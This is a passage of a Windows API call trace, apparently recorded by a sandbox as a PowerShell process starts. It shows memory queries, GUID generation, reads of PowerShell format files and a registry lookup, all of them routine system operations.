	[0283.165] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.165] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.165] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x65eea07e, Data2=0xd9bd, Data3=0x4dc5, Data4=([0]=0xbb, [1]=0xdb, [2]=0xe9, [3]=0x6c, [4]=0xff, [5]=0x1d, [6]=0xb0, [7]=0x95))) returned 0x0
	[0283.165] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xcc8c9054, Data2=0x8d95, Data3=0x4a3b, Data4=([0]=0xb7, [1]=0x87, [2]=0x1a, [3]=0x75, [4]=0x53, [5]=0x6c, [6]=0x8f, [7]=0xc5))) returned 0x0
	[0283.166] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x58afd081, Data2=0x25b, Data3=0x4031, Data4=([0]=0x93, [1]=0x9e, [2]=0xdf, [3]=0xd, [4]=0xaa, [5]=0x3e, [6]=0x77, [7]=0xf3))) returned 0x0
	[0283.166] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x2c22643c, Data2=0xc703, Data3=0x49f1, Data4=([0]=0xb3, [1]=0x99, [2]=0xb2, [3]=0x1d, [4]=0xdd, [5]=0x7c, [6]=0x65, [7]=0xfe))) returned 0x0
	[0283.166] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.166] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x7945d056, Data2=0x7834, Data3=0x4ea5, Data4=([0]=0x8d, [1]=0x24, [2]=0x4c, [3]=0x88, [4]=0x57, [5]=0x43, [6]=0x4f, [7]=0x58))) returned 0x0
	[0283.167] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.167] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.167] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.167] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.167] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.168] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x78bd02d9, Data2=0x2dce, Data3=0x4680, Data4=([0]=0xb9, [1]=0x98, [2]=0x17, [3]=0x95, [4]=0xbb, [5]=0x28, [6]=0x2, [7]=0x1))) returned 0x0
	[0283.168] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xb7f94ef, Data2=0x5344, Data3=0x4bbc, Data4=([0]=0xb8, [1]=0xda, [2]=0x2f, [3]=0xd5, [4]=0x72, [5]=0xc0, [6]=0x34, [7]=0x4c))) returned 0x0
	[0283.168] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xbbceac8f, Data2=0x9271, Data3=0x41f1, Data4=([0]=0xb8, [1]=0xd1, [2]=0x6c, [3]=0xe4, [4]=0xb4, [5]=0xe5, [6]=0x30, [7]=0x9e))) returned 0x0
	[0283.168] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xd27c3ff6, Data2=0x132c, Data3=0x4687, Data4=([0]=0xab, [1]=0xce, [2]=0xfe, [3]=0x31, [4]=0xe2, [5]=0xba, [6]=0xc4, [7]=0xb0))) returned 0x0
	[0283.169] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x230a2eb3, Data2=0x9b45, Data3=0x412b, Data4=([0]=0x8b, [1]=0xe2, [2]=0x81, [3]=0x95, [4]=0x1d, [5]=0xd1, [6]=0x14, [7]=0xc5))) returned 0x0
	[0283.169] VirtualQuery (in: lpAddress=0x16c120, lpBuffer=0x16cfe0, dwLength=0x30 | out: lpBuffer=0x16cfe0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.169] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xbe5e8a28, Data2=0xe94e, Data3=0x4b18, Data4=([0]=0x90, [1]=0xb7, [2]=0xdc, [3]=0xfe, [4]=0xdd, [5]=0x16, [6]=0xdf, [7]=0x1b))) returned 0x0
	[0283.169] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xf34554, Data2=0x1827, Data3=0x4c74, Data4=([0]=0x84, [1]=0xca, [2]=0xf1, [3]=0xce, [4]=0x33, [5]=0xaa, [6]=0x1e, [7]=0x5b))) returned 0x0
	[0283.170] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xf4830913, Data2=0xb17a, Data3=0x454b, Data4=([0]=0x89, [1]=0xde, [2]=0xca, [3]=0x53, [4]=0xf8, [5]=0x44, [6]=0xe8, [7]=0x4c))) returned 0x0
	[0283.170] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x708043a0, Data2=0x254f, Data3=0x4d2c, Data4=([0]=0x9e, [1]=0x53, [2]=0x7b, [3]=0xa1, [4]=0xd, [5]=0x60, [6]=0xf4, [7]=0xfa))) returned 0x0
	[0283.170] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x4f277d64, Data2=0xd3f7, Data3=0x4b4c, Data4=([0]=0x99, [1]=0xeb, [2]=0x2, [3]=0xa2, [4]=0x4e, [5]=0xc0, [6]=0x84, [7]=0x4a))) returned 0x0
	[0283.170] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xffcddeb8, Data2=0x1db4, Data3=0x4749, Data4=([0]=0x8a, [1]=0x62, [2]=0xdb, [3]=0xf1, [4]=0x5c, [5]=0x3a, [6]=0x56, [7]=0xe2))) returned 0x0
	[0283.171] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xe37809e9, Data2=0x30, Data3=0x425b, Data4=([0]=0x9a, [1]=0x7b, [2]=0x3e, [3]=0xc4, [4]=0xc2, [5]=0x8e, [6]=0xa9, [7]=0x5a))) returned 0x0
	[0283.171] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x14448803, Data2=0x31d2, Data3=0x4518, Data4=([0]=0x86, [1]=0x56, [2]=0xff, [3]=0x55, [4]=0x9e, [5]=0x1a, [6]=0x76, [7]=0x61))) returned 0x0
	[0283.171] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xe4c18cff, Data2=0x76c1, Data3=0x4773, Data4=([0]=0xad, [1]=0x99, [2]=0x65, [3]=0xa5, [4]=0xb4, [5]=0xb6, [6]=0xb, [7]=0xd5))) returned 0x0
	[0283.171] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x53eddf07, Data2=0x9a53, Data3=0x4659, Data4=([0]=0xa1, [1]=0xa5, [2]=0x21, [3]=0xe3, [4]=0x77, [5]=0x7a, [6]=0xeb, [7]=0xf7))) returned 0x0
	[0283.172] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x1c0b538c, Data2=0x6f47, Data3=0x401c, Data4=([0]=0x9f, [1]=0x9c, [2]=0x85, [3]=0x4c, [4]=0x94, [5]=0x7f, [6]=0x1, [7]=0x74))) returned 0x0
	[0283.172] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x54309360, Data2=0x4d58, Data3=0x4362, Data4=([0]=0x80, [1]=0xd1, [2]=0x70, [3]=0x62, [4]=0x21, [5]=0xa7, [6]=0x6d, [7]=0x69))) returned 0x0
	[0283.172] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xd60316f1, Data2=0x7597, Data3=0x4c7c, Data4=([0]=0xaa, [1]=0xbc, [2]=0xa2, [3]=0xee, [4]=0xd4, [5]=0x9a, [6]=0x7b, [7]=0x80))) returned 0x0
	[0283.172] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xa078a453, Data2=0x3741, Data3=0x4acb, Data4=([0]=0x87, [1]=0x6b, [2]=0x7a, [3]=0x14, [4]=0xf7, [5]=0xa6, [6]=0xdd, [7]=0xb9))) returned 0x0
	[0283.173] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xbd5458c4, Data2=0x76af, Data3=0x41c5, Data4=([0]=0xaf, [1]=0xae, [2]=0xc2, [3]=0x24, [4]=0xb3, [5]=0xf3, [6]=0x8d, [7]=0xeb))) returned 0x0
	[0283.173] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xe20992fa, Data2=0xd273, Data3=0x49b7, Data4=([0]=0xb5, [1]=0x70, [2]=0xff, [3]=0xcf, [4]=0xfa, [5]=0x36, [6]=0x40, [7]=0xb7))) returned 0x0
	[0283.173] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x84e9ace7, Data2=0x9d5b, Data3=0x4390, Data4=([0]=0xb9, [1]=0xe6, [2]=0xf4, [3]=0x49, [4]=0xc8, [5]=0xa0, [6]=0xc, [7]=0x98))) returned 0x0
	[0283.173] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x6d64fd81, Data2=0xe829, Data3=0x449a, Data4=([0]=0x87, [1]=0x97, [2]=0x16, [3]=0x9c, [4]=0xe6, [5]=0xb7, [6]=0x84, [7]=0x8d))) returned 0x0
	[0283.173] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xe353441b, Data2=0x6b04, Data3=0x461f, Data4=([0]=0xb5, [1]=0x90, [2]=0xf3, [3]=0xa, [4]=0x36, [5]=0x47, [6]=0x63, [7]=0x8e))) returned 0x0
	[0283.174] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.174] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.174] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.175] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x1c81be93, Data2=0x88b1, Data3=0x4826, Data4=([0]=0x96, [1]=0xf, [2]=0x35, [3]=0xa5, [4]=0x59, [5]=0xe6, [6]=0xf5, [7]=0xf8))) returned 0x0
	[0283.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.175] SetErrorMode (uMode=0x1) returned 0x1
	[0283.175] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0283.175] GetFileType (hFile=0x1c8) returned 0x1
	[0283.175] SetErrorMode (uMode=0x1) returned 0x1
	[0283.176] GetFileType (hFile=0x1c8) returned 0x1
	[0283.176] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e218c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e218c8*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.176] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e218c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e218c8*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.176] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e218c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e218c8*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.176] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e218c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e218c8*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.176] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e218c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e218c8*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.177] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e218c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e218c8*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.177] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e218c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e218c8*, lpNumberOfBytesRead=0x16d1f8*=0x119, lpOverlapped=0x0) returned 1
	[0283.177] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e218c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e218c8*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0283.177] CloseHandle (hObject=0x1c8) returned 1
	[0283.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.177] SetErrorMode (uMode=0x1) returned 0x1
	[0283.177] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d1a0 | out: lpFileInformation=0x16d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0283.178] SetErrorMode (uMode=0x1) returned 0x1
	[0283.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.178] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d288 | out: phkResult=0x16d288*=0x1c8) returned 0x0
	[0283.178] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d20c, lpData=0x0, lpcbData=0x16d208*=0x0 | out: lpType=0x16d20c*=0x1, lpData=0x0, lpcbData=0x16d208*=0x56) returned 0x0
	[0283.178] CoTaskMemAlloc (cb=0x5a) returned 0x2dde70
	[0283.178] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d1dc, lpData=0x2dde70, lpcbData=0x16d1d8*=0x56 | out: lpType=0x16d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d1d8*=0x56) returned 0x0
	[0283.178] CoTaskMemFree (pv=0x2dde70) 
	[0283.178] RegCloseKey (hKey=0x1c8) returned 0x0
	[0283.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.180] VirtualQuery (in: lpAddress=0x16bd20, lpBuffer=0x16cbe0, dwLength=0x30 | out: lpBuffer=0x16cbe0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.180] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xe610914f, Data2=0x9af5, Data3=0x49ad, Data4=([0]=0x85, [1]=0xe, [2]=0x38, [3]=0x8, [4]=0xfb, [5]=0x19, [6]=0x78, [7]=0x9f))) returned 0x0
	[0283.180] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.180] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x968346ee, Data2=0x485f, Data3=0x462a, Data4=([0]=0x83, [1]=0xd0, [2]=0xa6, [3]=0xcc, [4]=0x65, [5]=0x57, [6]=0x40, [7]=0xbf))) returned 0x0
	[0283.180] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x36e0c2fd, Data2=0xa850, Data3=0x4f7c, Data4=([0]=0xb7, [1]=0x63, [2]=0xe2, [3]=0xf7, [4]=0x19, [5]=0xc2, [6]=0x70, [7]=0x69))) returned 0x0
	[0283.181] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x762a807e, Data2=0xef40, Data3=0x4da2, Data4=([0]=0x90, [1]=0x68, [2]=0x32, [3]=0xfe, [4]=0x2f, [5]=0x7c, [6]=0x23, [7]=0xeb))) returned 0x0
	[0283.181] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.181] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.181] SetErrorMode (uMode=0x1) returned 0x1
	[0283.181] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0283.182] GetFileType (hFile=0x1c8) returned 0x1
	[0283.182] SetErrorMode (uMode=0x1) returned 0x1
	[0283.182] GetFileType (hFile=0x1c8) returned 0x1
	[0283.182] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.182] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.182] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.182] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.183] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.183] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.183] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.183] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.184] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.184] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.185] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.186] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.186] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.187] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
